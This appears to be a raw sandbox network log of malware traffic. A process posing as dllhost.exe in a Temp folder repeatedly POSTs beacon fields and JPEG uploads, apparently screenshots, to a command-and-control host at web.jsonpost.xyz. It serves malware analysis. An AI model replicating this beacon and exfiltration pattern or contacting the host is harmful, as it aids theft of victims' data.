                                                                                Nov 29, 2024 01:52:15.180977106 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:15.181057930 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:15.301019907 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:15.301048040 CET2472OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:15.301071882 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:15.301090002 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:15.301161051 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:15.301233053 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:15.301311016 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.44974872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:16.064665079 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.44975072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:16.532196999 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:16.532391071 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:16.532465935 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:16.532497883 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:16.652507067 CET7416OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:16.652540922 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:16.652556896 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:16.652653933 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:16.652702093 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:16.652759075 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:16.773580074 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.44975272.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:17.586007118 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.44975372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:18.059998989 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b9b9ff44e8c4fb7bf9d9e9a94afafff0
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 99446
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:18.060034037 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 39 62 39 66 66 34 34 65 38 63 34 66 62 37 62 66 39 64 39 65 39 61 39 34 61 66 61 66 66 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b9b9ff44e8c4fb7bf9d9e9a94afafff0Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:18.060115099 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:18.060163021 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:18.180198908 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:18.180248976 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:18.180275917 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:18.180454016 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:18.180474043 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:18.180536032 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:18.300163984 CET2472OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.44975572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:18.968494892 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.44975672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:19.807667017 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:19.807710886 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:19.807790995 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:19.807980061 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:19.927830935 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:19.927946091 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:19.928033113 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:19.928077936 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:19.928167105 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:19.928189039 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
